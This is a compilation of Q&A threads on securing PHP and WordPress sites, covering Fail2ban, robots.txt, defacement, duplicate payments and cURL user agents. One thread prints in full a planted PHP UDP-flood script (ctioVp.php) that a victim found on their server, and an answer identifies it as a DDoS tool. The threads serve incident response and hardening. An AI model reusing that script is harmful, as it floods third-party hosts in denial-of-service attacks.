Blocking HTTP POST attack via mod_rewrite - php

I have a WordPress site that is being attacked with the following HTTP POST requests:
x.x.x.x - - [15/Jul/2013:01:26:52 -0400] "POST /?CtrlFunc_stttttuuuuuuvvvvvwwwwwwxxxxxyy HTTP/1.1" 200 23304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
x.x.x.x - - [15/Jul/2013:01:26:55 -0400] "POST / HTTP/1.1" 200 23304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
The attack itself isn't bad enough to bring down Apache, but it does drive up CPU usage more than I'd like. I would therefore like to block these requests using mod_rewrite (a straight 403 should do it), but I've had no luck so far with anything I've tried. I want to block all blank HTTP POST requests to / as well as POSTs to /?CtrlFunc_*.
What I've done as a workaround for now is block all HTTP POST traffic, but that won't work long-term.
Any ideas? I've invested several hours on this and have not made much progress.
Thanks!
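For reference, the kind of rule being asked for might look roughly like the following. This is a minimal, untested sketch that assumes mod_rewrite is enabled and the rules live in the site's .htaccess; the CtrlFunc_ prefix is taken from the log lines above.
RewriteEngine On
# Return 403 for POST requests to / whose query string is empty or starts with CtrlFunc_
RewriteCond %{REQUEST_METHOD} ^POST$
RewriteCond %{REQUEST_URI} ^/$
RewriteCond %{QUERY_STRING} ^$ [OR]
RewriteCond %{QUERY_STRING} ^CtrlFunc_
RewriteRule ^ - [F]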

Instead of blocking the request via mod_rewrite, I'd use it as bait to record the IPs of the offenders. Then adding them to a 96-hour blacklist in your firewall will block all requests from them.
See Fail2ban.
Specifically, I believe that Fail2ban filters are the right place to start when writing a filter for your URL-specific case.
http://www.fail2ban.org/wiki/index.php/MANUAL_0_8#Filters
http://www.fail2ban.org/wiki/index.php/HOWTO_apache_myadmin_filter

Here is a Fail2ban blog post that creates a filter for this POST attack.
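As a rough illustration of what such a filter might look like (the filter name, log path, and regex below are assumptions for this sketch, not taken from the blog post):
# /etc/fail2ban/filter.d/apache-ctrlfunc.conf (hypothetical filter name)
[Definition]
failregex = ^<HOST> .* "POST /(\?CtrlFunc_\S*)? HTTP/1\.[01]"
ignoreregex =

# Corresponding jail entry in jail.local
[apache-ctrlfunc]
enabled  = true
port     = http,https
filter   = apache-ctrlfunc
logpath  = /var/log/apache2/access*.log
maxretry = 3
# 345600 seconds = 96 hours, matching the blacklist window suggested above
bantime  = 345600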

Related

Is there a reason not to put my admin directory in robots.txt?

This may have been asked and answered before, since I'm not sure of the best way to phrase this.
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
My admin directory is not called "admin" (the most common security-by-obscurity tactic)
Directory browsing is already blocked
Any IP that connects to my admin directory without first logging in with appropriate permissions is blacklisted. I have been monitoring this, and only a couple of legit spiders have been blacklisted this way
I'm using .htaccess (merging several public blacklists) and PHP blacklisting based on behaviors (some automatic, but still Mark-I eyeball as well)
All actions on the admin side are auth-based
The only links to the admin side are presented to authorized users with the appropriate permissions.
I'm not sure if I should put the admin directory in robots.txt. On one hand, legit spiders will stay out of that directory, but on the other, I'm telling those who want to do harm that the directory exists, and I don't want prying eyes...
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
You rightly recognize the conundrum. If you put the admin url in the robots.txt, then well-behaved bots will stay away. On the other hand, you are basically telegraphing to bad folks where the soft spots are.
If you inspect your web server's access log, you will most likely see a LOT of requests for admin-type pages. For instance, looking at the Apache log on one of my servers, I see opportunistic script kiddies searching for WordPress, phpMyAdmin, etc.:
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpc.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpo.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:37 -0600] "GET /wp-config.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:43 -0600] "POST /wp-admins.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
109.98.109.101 - - [24/Jan/2019:08:50:01 -0600] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:49:35 -0600] "GET /phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
My access log has thousands upon thousands of these. Bots search for them all the time and none of these files are listed in my robots.txt file. As you might guess, unless you have an admin url that is really randomly named, the bad guys could very well guess its name is /admin.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
I'd strongly recommend spending some time banning bad bots, or basically any bots you have no use for. AhrefsBot and SemrushBot come to mind. It shouldn't be too hard to find bad-bot lists, but you'll need to evaluate any list you find to make sure it isn't blocking bots you want to serve. In addition to adding an exclusion rule to your robots.txt file, you should probably configure your application to ban bad bots by sending a 403 Forbidden, a 410 Gone, or another HTTP response code of your choice.
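A minimal sketch of that application-side ban in PHP (the bot list here is assumed and purely illustrative; adapt it to the bots you actually see in your logs):
<?php
// Refuse requests from crawlers you have no use for.
$badBots = ['AhrefsBot', 'SemrushBot', 'MJ12bot'];
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
foreach ($badBots as $bot) {
    if (stripos($ua, $bot) !== false) {
        http_response_code(403); // or 410 Gone, as suggested above
        exit;
    }
}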
In the end, it's critical to remember the maxim that "security by obscurity is not security". One of the most important principles of encryption and security is Kerckhoffs' principle, i.e. "the enemy knows the system." Your site should not rely solely on the location of your admin URLs being obscure or secret. You must require authentication and use sound best practices in your authentication code. I would not rely on Apache authentication, but would instead code my web application to accept the user login/password in a securely hosted form (use HTTPS), and I would store only the hashed form of those passwords. Never store cleartext passwords.
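A minimal sketch of that hashed-password approach using PHP's built-in password API (the variable and storage names are assumptions):
<?php
// Registration / password change: store only the hash, never the cleartext password.
$hash = password_hash($_POST['password'], PASSWORD_DEFAULT);
// ... persist $hash in the users table ...

// Login: compare the submitted password against the stored hash.
if (password_verify($_POST['password'], $storedHash)) {
    // authenticated; start the session, etc.
}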
In the end, the security of your system is only as good as its weakest link. There is some value in having a unique or unusual admin URL, because you might be exposed to fewer attacks, but this in itself doesn't provide any real security. If you still have reservations about broadcasting this URL in your robots.txt file, perhaps weigh that against the problems you might expect if GoogleBot or BingBot or some other friendly bot starts stomping around in your admin URLs. Would it bother you if these URLs ended up in the Google search index?

Shared hosting at GoDaddy hacked: index.php and login.php automatically changed

Yesterday, many web applications that I host on GoDaddy shared hosting got defaced (hacked). The attackers changed index.php and login.php to the following source code:
Deface By black sQl
HACKED BY black sQl
WARNING!!!
Lets start to secure your website
But Remember This SECUIRITY IS AN ILLUSION!! BD Black Hackers Cyber Army black sql::!hR V1Ru5::3lack D4G0N::TLM-V1Ru5
I do not know how they did this, as it is just a login page: there is no use of GET, the username and password are the only fields the user can input, and they are sanitized before they enter any function.
I checked the raw access logs and found some suspicious entries, such as the following:
46.118.158.19 - - [29/Sep/2017:06:27:29 -0700] "GET / HTTP/1.1" 200 522 "http://pochtovyi-index.ru/" "Opera/8.00 (Windows NT 5.1; U; en)"
188.163.72.15 - - [29/Sep/2017:06:48:37 -0700] "GET / HTTP/1.1" 200 522 "https://educontest.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Can anybody help me secure against this kind of intrusion?
It depends on how the attacker gained access.
The major steps to take into consideration are:
Restrict access to the server using .htaccess
Use PDO prepared statements to protect your apps from SQL injection (see the sketch below)
Protect your apps with CSRF tokens
etc. Check this all-in-one cheat sheet.
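As a minimal sketch of the PDO point above (connection details, table, and column names are assumptions):
<?php
// Connect with exceptions enabled so failed queries are not silently ignored.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

// Parameterized query: user input is bound, never interpolated into the SQL string.
$stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :username');
$stmt->execute([':username' => $_POST['username']]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// Verify the password against the stored hash.
if ($row && password_verify($_POST['password'], $row['password_hash'])) {
    // authenticated
}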

Wordpress Site or Server getting hacked with huge amount of php and html files uploaded

I am having a big issue with a person who is uploading files to the root of my website without my permission. I have tried:
blocking the IPs
updating WordPress (4.1.1)
adding a plugin like Better WP Security and configuring it correctly
removing each file that he uploaded
changing the permissions of the public FTP directory to 750
Still, I am getting hundreds of files every hour. What could it be? The log looks like this:
112.6.228.87 - - [13/Apr/2015:13:40:13 +0100] "GET /ctioVp.php?host=37.157.198.94&port=8888&time=90&rat=0&len=65536 HTTP/1.1" 404 10352 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
61.152.102.40 - - [13/Apr/2015:13:40:19 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.0" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.1" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/9970-ywek.html HTTP/1.1" 200 12347 "http://.co.uk/aaadqm/6204-imvh.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
And there are more IPs (static) and more files and folders. I am hosting the website myself and have WHM and cPanel.
ctioVp.php looks like this:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = $_GET['len'];
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
{
    if (StrLen($_GET['rat'])<>0)
    {
        echo php_uname();
        exit;
    }
    exit;
}
for($i=0; $i < $Sendlen; $i++)
{
    $out .= "A";
}
$max_time = time() + $exec_time;
while(1)
{
    if(time() > $max_time)
    {
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if($fp)
    {
        fwrite($fp, $out);
        fclose($fp);
    }
}
And the rest of the files are HTML files with Chinese content.
The script you've posted is used to flood a given server with UDP packets (i.e., it is a DDoS tool).
The problem with a compromised server is that you don't know what else the attacker did. Maybe they installed a rootkit or something similar.
The only safe way to recover from this is to take the server offline and start over from a known non-compromised backup.
See also https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server
I agree that the best way to recover is to restore a full server backup, but in this instance I think it's unlikely that the server itself was compromised, since that would require a privilege escalation vulnerability in Apache or another component. The most likely cause is a vulnerability in WordPress.
Reinstalling a clean site backup (both files and database) is the best method for getting rid of malicious content. Whether you go for a full server restore, a WP restore, or a file cleanup, you still have to take care of the root cause. Alongside what you already did, you should:
Change your passwords.
Update all your plugins and themes; they are often overlooked but are also attack vectors, since they can bundle vulnerable components.
wpvulndb.com might help identify those.

Payment queuing system for PHP

I'm trying to figure out the best way to handle payment processing to prevent duplicate payment submissions. I'm using PHP (specifically CakePHP 2.3.8) with Balanced Payments to handle the payment processing.
I've noticed in my server logs that I've had multiple requests submitted all within a second, usually for something related to WordPress or phpMyAdmin, such as:
ip.address.here - [08/Jul/2014:15:03:12 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
ip.address.here - [08/Jul/2014:15:03:12 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
ip.address.here - [08/Jul/2014:15:03:12 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
ip.address.here - [08/Jul/2014:15:03:13 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
I'm worried about someone trying something similar (accidental or not) but with a payment. What is the most effective way to handle a situation like the above, where multiple requests come in very quickly, regardless of whether it's a "hacker" or just a hiccup in the system? If I use a queuing system like this one, specifically for CakePHP, how would I keep track of previously processed entries in order to detect duplicate submissions?
Say I have a queue of 3 entries. While processing entry 1, would I check entries 2 and 3 to make sure they're not duplicates? If they are, would I just delete them?
In my experience, you should save a session identifier that stays the same until the transaction has finished or has been canceled. Usually the payment gateway takes that session identifier to check that you're not duplicating the transaction.
Also, the payment gateway should detect duplicates (i.e. same card info and same amount in a short period of time) and will return an error to you, letting you know what happened.
So, just remember to keep track of your unique ID and reset it when the transaction is completed. If you're keeping a shopping cart and it expires, make the transaction ID expire at the same time. And finally, make sure to disable the submit button with JavaScript so users don't tap it more than once.
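A minimal sketch of that idea in plain PHP (the session key, field name, and 409 response are assumptions; this is not the CakePHP or Balanced API):
<?php
session_start();

// Issue a token when the checkout form is rendered; the form must include it
// as a hidden field named txn_id.
if (empty($_SESSION['txn_id'])) {
    $_SESSION['txn_id'] = bin2hex(random_bytes(16));
}

// On submit: process only if the posted token matches, then consume it
// so a double-click or replay of the same form is ignored.
if (isset($_POST['txn_id']) && hash_equals($_SESSION['txn_id'], $_POST['txn_id'])) {
    unset($_SESSION['txn_id']);   // consume the token before charging
    // ... call the payment gateway, passing this id so it can de-duplicate too ...
} else {
    http_response_code(409);      // duplicate or stale submission
}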

Changing the user-agent

Well, I have the following problem. I made a tool that checks the status of a website.
For example, if I enter www.youtube.com it will say:
http://www.youtube.com HTTP/1.0 200 OK
and for a website with a redirect it will say:
http://www.imgur.com HTTP/1.1 302 Moved Temporarily
http://imgur.com/ HTTP/1.1 200 OK
Alright, this works just as it should; however, I would like to make it possible to select the user-agent, for example an Android one, because YouTube on Android will redirect to m.youtube.com.
I have already made a dropdown list with different user-agents; what I don't know is how to change the user-agent of the request. When I search Google, it just gives me browser plugins or add-ons.
I hope someone knows of a way to do this.
Thanks in advance!
You can send a cURL request and change the user agent like this:
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
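Putting it together, a minimal sketch of the status check with a selectable user agent (the example user-agent string and URL are placeholders; in the tool they would come from the dropdown and the input field):
<?php
$userAgent = 'Mozilla/5.0 (Linux; Android 10; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0 Mobile Safari/537.36';

$ch = curl_init('https://www.youtube.com');
curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  // capture the body instead of printing it
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);  // follow redirects, e.g. to m.youtube.com
curl_exec($ch);

$status   = curl_getinfo($ch, CURLINFO_HTTP_CODE);      // final HTTP status code
$finalUrl = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);  // URL after redirects
curl_close($ch);

echo "$finalUrl HTTP $status\n";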
